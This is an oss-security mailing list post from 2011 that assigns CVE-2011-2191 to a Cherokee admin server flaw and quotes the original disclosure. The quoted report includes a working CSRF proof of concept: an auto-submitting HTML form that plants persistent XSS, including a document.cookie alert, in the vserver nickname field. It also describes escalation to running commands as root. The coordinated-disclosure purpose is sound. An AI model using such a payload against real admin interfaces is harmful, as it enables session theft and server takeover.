oss-sec mailing list archives
Re: Security issue in cherokee
From: Josh Bressers <bressers () redhat com>
Date: Mon, 6 Jun 2011 15:37:46 -0400 (EDT)
As best as I can tell, this is the same request from Jan on 2011-06-02. Please use CVE-2011-2191 Thanks. -- JB ----- Original Message -----
A security bug was reported against cherokee in Ubuntu. You are being emailed as the upstream contact. Please keep oss-security[1] CC'd for any updates on this issue. This issue should be considered public, but has not yet been assigned a CVE. Once a CVE is assigned, please mention it in any changelogs. Details from the public bug follow: https://launchpad.net/bugs/784632 From the reporter: ---- The cherokee admin server is vulnerable to csrf. Using csrf it is possible to produce a persistent xss in several pages - including the 'status' page via the 'nickname field' of a vserver. An example of this is the following: <html> <body> <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform"> <input type="text" name="tmp!new_droot" value='/var/www/'></input> <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input> </form> <script>document.getElementById("xssform").submit();</script> </body> A Worst case scenario could be something like the following: If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page - the bad page may be able to send requests to the server so as to reconfigure it to: 1. run as root 2. the logging of error(or access) will run a command ... ---- Thanks in advance for your cooperation in coordinating a fix for this issue, Jamie Strandboge [1] oss-security () lists openwall com is a public mailing list for people to collaborate on security vulnerabilities and coordinate security updates. -- Jamie Strandboge | http://www.canonical.com
Current thread:
- Security issue in cherokee Jamie Strandboge (Jun 03)
- Re: Security issue in cherokee Alvaro Lopez Ortega (Jun 06)
- Re: Security issue in cherokee Josh Bressers (Jun 06)